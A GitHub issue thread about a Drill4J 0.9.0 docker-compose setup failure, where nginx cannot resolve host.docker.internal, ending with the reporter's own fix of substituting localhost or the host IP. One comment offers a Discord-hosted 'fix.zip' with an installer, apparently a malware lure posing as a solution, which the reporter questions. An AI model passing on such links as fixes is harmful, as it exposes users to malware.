### ISSUE TITLE
problem in setup in 0.9.0 version

### ISSUE THREAD

**Issue by Utk98** [Drill4J/Drill4J#252]
# New Issue

## Description

.As told yesterday today I was setuping the 0.9.0 version and following that drill4j documentation.When i run docker-compose up -d , localhost:8095 work but localhost:8091 and localhost:8090 didn't work .

## Details

1. Attach full log files of your Application Under Test. Make sure it includes Drill4J Agent ASCII logo followed by version 
    

/docker-entrypoint.sh: /docker-entrypoint.d/ is not empty, will attempt to perform configuration
/docker-entrypoint.sh: Looking for shell scripts in /docker-entrypoint.d/
/docker-entrypoint.sh: Launching /docker-entrypoint.d/10-listen-on-ipv6-by-default.sh
10-listen-on-ipv6-by-default.sh: info: Getting the checksum of /etc/nginx/conf.d/default.conf
10-listen-on-ipv6-by-default.sh: info: Enabled listen on IPv6 in /etc/nginx/conf.d/default.conf
/docker-entrypoint.sh: Sourcing /docker-entrypoint.d/15-local-resolvers.envsh
/docker-entrypoint.sh: Launching /docker-entrypoint.d/20-envsubst-on-templates.sh
/docker-entrypoint.sh: Launching /docker-entrypoint.d/30-tune-worker-processes.sh
/docker-entrypoint.sh: Configuration complete; ready for start up
2024/09/03 12:45:23 [emerg] 1#1: host not found in upstream "host.docker.internal:8090" in /etc/nginx/nginx.conf:9
nginx: [emerg] host not found in upstream "host.docker.internal:8090" in /etc/nginx/nginx.conf:9
 

2. Describe your tech stack (for both application and tests) 
   - OS: 
   - Tech stack: 
   java application 

## Screenshots

![image](https://github.com/user-attachments/assets/8dc1ebc6-9407-45fc-aea8-e56938de13c5)

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by Utk98** [comment]
these are the log files -->
/docker-entrypoint.sh: /docker-entrypoint.d/ is not empty, will attempt to perform configuration
/docker-entrypoint.sh: Looking for shell scripts in /docker-entrypoint.d/
/docker-entrypoint.sh: Launching /docker-entrypoint.d/10-listen-on-ipv6-by-default.sh
10-listen-on-ipv6-by-default.sh: info: Getting the checksum of /etc/nginx/conf.d/default.conf
10-listen-on-ipv6-by-default.sh: info: Enabled listen on IPv6 in /etc/nginx/conf.d/default.conf
/docker-entrypoint.sh: Sourcing /docker-entrypoint.d/15-local-resolvers.envsh
/docker-entrypoint.sh: Launching /docker-entrypoint.d/20-envsubst-on-templates.sh
/docker-entrypoint.sh: Launching /docker-entrypoint.d/30-tune-worker-processes.sh
/docker-entrypoint.sh: Configuration complete; ready for start up
2024/09/03 12:45:23 [emerg] 1#1: host not found in upstream "host.docker.internal:8090" in /etc/nginx/nginx.conf:9
nginx: [emerg] host not found in upstream "host.docker.internal:8090" in /etc/nginx/nginx.conf:9

**Comment by Utk98** [comment]
Is the file contain any type of virus , because it is not opening @Limxxx 
![image](https://github.com/user-attachments/assets/7035c2af-b436-4015-8731-c9ab5da809c0)

**Comment by Utk98** [comment]
@RomanDavlyatshin I found a solution that if you are running in ubuntu or aws worskpace then you have to change host.docker.internal:host-gateway to "localhost" or ipaddress of yours

**Comment by Utk98** [comment]
completed with it

**Comment by Utk98** [comment]
It is showing this content is no longer available
